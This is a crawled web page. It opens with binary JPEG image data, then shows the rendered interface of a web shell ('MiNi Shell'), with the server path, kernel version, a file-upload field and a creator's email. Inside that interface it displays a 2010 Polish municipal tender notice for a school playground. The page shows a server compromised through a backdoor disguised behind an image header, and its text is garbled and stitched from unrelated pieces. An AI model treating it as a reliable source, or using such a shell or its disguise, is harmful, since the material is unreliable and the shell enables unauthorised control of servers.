JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100806/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100806/241704-N-2010.html

<p class="kh_header"><b>Jerzmanowice-Przeginia: Plac zabaw przy Szkole Podstawowej w Racławicach</b><br>
<b>Numer ogłoszenia: 241704 - 2010; data zamieszczenia: 06.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jerzmanowice-Przeginia , Jerzmanowice 372B, 32-048 Jerzmanowice-Przeginia, woj. małopolskie, tel. 0-123895247, 3895022, faks 0-12 3895521.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jerzmanowice-przeginia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Plac zabaw przy Szkole Podstawowej w Racławicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Ułożenie 150 m2 nawierzchni bezpiecznej w kolorze pomarańczowym  RAL: 2011 - zgodnie z wytycznymi programu Radosna szkoła oraz PN-EN1176-1 Wyposażenie placów zabaw:
1) usunięcie nadmiaru ziemi
2) utwardzenie terenu tłuczniem lub klińcem:
a) Kruszywo łamane drobne (Frakcja 0-4 mm), grubość warstwy do ok. 3cm 
b) Kruszywo łamane grube (Frakcja 4-31,5 mm), gr. warstwy do ok. 15 cm
c) Podsypka piaskowa grubość do ok. 10cm
d) Grunt rodzimy
3) ułożenie nawierzchni z płyt (np. FLEXI-STEP ) bądź wylanie pianki - ze spadkiem 1% w stronę wschodnią:
a) ~125 m2 obszar o wysokości upadkowej do 1,50 m 
b) ~25 m2 obszar o wysokości upadkowej do 2,40 m 
4) Ułożenie obrzeży ścieżki elastycznym elementem o wymiarach 1000x250x50mm.
2. Ułożenie 20 m2 ścieżki komunikacyjnej, nawierzchni typu tartan - w kolorze niebieskim RAL: 5003 - zgodnie z wytycznymi programu Radosna szkoła oraz PN-EN1176-1 Wyposażenie placów zabaw:
1) usunięcie nadmiaru ziemi
2) ułożenie nawierzchni na obszarze 20 m2 ze spadkiem poprzecznym 2%:
a) Elastyczna nawierzchnia,
b) Wylewka betonowa gr. do ok. 15cm (po zagęszczeniu - do ok. 12 cm)
c) Podsypka piaskowa gr. do ok. 10cm,
d) Grunt rodzimy.
3)ułożenie obrzeży ścieżki elastycznym elementem o wymiarach ok. 1000x250x50mm
3. Zainstalowanie urządzeń placu zabaw:
1) wykopanie fundamentów 40 x 40 x 60 cm dla instalacji urządzeń,
2) zabetonowanie kotew stalowych ocynkowanych do instalacji urządzeń,
3) zainstalowanie urządzeń:
a) Huśtawka wahadłowa podwójna metalowa 1 szt. (wg wzoru lub równoważna),
b) Sześciokąt Wielofunkcyjny 1 szt. (zgodny z wzorem lub równoważny),
c) Zestaw zabawowy z 2 wież z przeplotnią, mostkiem i zjeżdżalnią 1 szt.  (zgodny z wzorem lub równoważny),
d) Huśtawka  na sprężynie 1 szt. (zgodna z wzorem lub równoważna )
e) Huśtawka wagowa ważka metalowa 1 szt. (zgodna z wzorem lub równoważna ),
f) Ławka 2 szt. (zgodna z wzorem lub równoważna),
g)Kosz na śmieci 2 szt. (zgodny z wzorem lub równoważny),
h)Tablica informacyjna (zawierająca napis o treści Szkolny plac zabaw wyposażony w ramach programu rządowego RADOSNA SZKOŁA oraz regulamin określający zasady i warunki korzystania z placu zabaw).
4. Zainstalowanie ogrodzenia:
1) wykopanie fundamentów 20 x 20 x 40 cm dla instalacji słupków ogrodzenia
2) zabetonowanie słupków
3) instalacja ~16 mb ogrodzenia i furtek wejściowych
5. Przygotowanie terenów zielonych:
1) splantowanie terenu ze spadkiem 2% w stronę wschodnią
2) usunięcie kamieni, korzeni, śmieci, starego krawężnika - ok. 25 mb
3) uzupełnienie żywopłotu, nasadzenie - ok. 7 mb - np. TUJA SZMARAGD - sadzonki o wys. 50 cm co 30 cm
4) przesadzenie 2 drzew z części zagospodarowanej na inną część działki inwestora
6. Zainstalowanie rury PE o przekroju 100 mm o długości ok. 18 m wraz ze spadkiem 2% i połączenie z rynną spustową znajdującą się w środkowej części placu.
7. Szczegółowy zakres prac określa dokumentacja techniczna, w skład której wchodzą: projekt zagospodarowania terenu, przedmiar robót, specyfikacja techniczna wykonania i odbioru robót a także wytyczne Programu Radosna Szkoła oraz PN-EN1176-1 Wyposażenie placów zabaw..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Wielkość zamowień uzupełniających stanowić będzie nie więcej niż 30 % wartości zamówienia podstawowego  i polegać będzie na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.00.00.00-7, 45.11.13.00-1, 45.45.00.00-6, 37.53.52.00-9, 37.53.52.20-5, 37.53.52.10-2, 37.53.52.50-4, 45.23.62.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium w wysokości 2 500,00 złotych,
słownie: dwa tysiące pięćset złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał co najmniej  2 roboty budowlane zbliżone charakterem do niniejszego zamówienia o wartości minimalnej 100.000,00 złotych brutto każda - z podaniem  wartości tej roboty, daty i miejsca wykonania - należy wypełnić Wykaz wykonanych robót, stanowiący załącznik nr 4 do SIWZ. Ponadto należy załączyć dokument potwierdzający, że roboty wskazane w załączniku nr 4 zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać iż dysponuje  co najmniej 1 osobą pełniącą funkcję kierownika budowy, posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej lub architektonicznej (dopuszcza się w ograniczonym zakresie) - należy załączyć wypełniony Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia stanowiący załącznik nr 5 do SIWZ, oraz załączyć oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane  uprawnienia - sporządzone wg wzoru stanowiącego załącznik nr 6 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Kosztorys ofertowy wg zamieszczonego przedmiaru robót sporządzony metodą uproszczoną z wyszczególnieniem: opisu roboty, ilości przedmiarowej, jednostki roboty, ceny jednostkowej roboty oraz wartości stanowiącej iloczyn ilości przedmiarowej i ceny jednostkowej (Formułę dla metody kalkulacji uproszczonej należy przyjąć wg punktu 3.1.1. Polskich standardów kosztorysowania robót budowlanych), na kwotę podaną w ofercie. Kosztorys należy potraktować jako dokument o charakterze informacyjno-pomocniczym, który będzie wykorzystywany do obliczenia należnego wynagrodzenia wykonawcy w przypadku odstąpienia od umowy, jak również wynagrodzenia za ewentualne zabezpieczenie przerwanych robót.
2) Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu, jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej. Wykonawcy występujący wspólnie ubiegający się o udzielenie zamówienia 
ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian  zawartej umowy:
1) Zamawiający przewiduje możliwość zmiany terminu wykonania przedmiotu umowy, jeżeli dochowanie terminu określonego w umowie jest niemożliwe z uwagi na: 
a) siłę wyższą lub inne okoliczności niezależne od Wykonawcy, lub których Wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć w tym dotyczące niesprzyjających warunków atmosferycznych, jak również inne przeszkody lub utrudnienia w wykonywaniu przedmiotu umowy spowodowane przez osoby trzecie, 
b) siłę wyższą (działania sił natury, uznanych za stan klęski żywiołowej) lub inne okoliczności niezależne od Zamawiającego, w tym takie których Zamawiający przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć; 
c) wykonanie nieprzewidzianych robót dodatkowych. W przypadku wystąpienia robót/zamówień dodatkowych Zamawiający wydłuży termin o czas niezbędny do ich wykonania jeżeli na konieczność ich wykonania niemożliwe jest dotrzymanie określonego w umowie terminu na roboty podstawowe.
d) konieczność wprowadzenia zmian w dokumentacji projektowej,
e) konieczność uzyskania dodatkowych opinii lub uzgodnień, 
2) Zamawiający przewiduje możliwość zmiany technologii wykonania robót, lub zmiany materiałów, jeżeli nowe rozwiązania będą korzystne dla zamawiającego, przy zachowaniu niepogorszonych standardów jakościowych.
3) Zamawiający przewiduje możliwość rezygnacji z części robót - ograniczenie zakresu robót wynikające z wprowadzenia zmian w dokumentacji projektowej, które wynikły w trakcie realizacji robót i były konieczne w celu prawidłowej realizacji przedmiotu umowy.
4) Zamawiający przewiduje możliwość zmiany wynagrodzenia Wykonawcy w przypadku wystąpienia zmiany przepisów dotyczących stawki podatku VAT - nastąpi zmiana wynagrodzenia o wartość zmienionego podatku VAT.
5) Zamawiający przewiduje możliwość zmiany umowy w przypadku wystąpienia robót zamiennych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jerzmanowice-przeginia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jerzmanowice-Przeginia, pok. 122, 32-048 Jerzmanowice 372 B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2010 godzina 10:00, miejsce: Dziennik  Podawczy  pok. nr 111  Urząd Gminy Jerzmanowice-Przeginia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Rządowy Program Radosna Szkoła współfinasowany ze środków Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com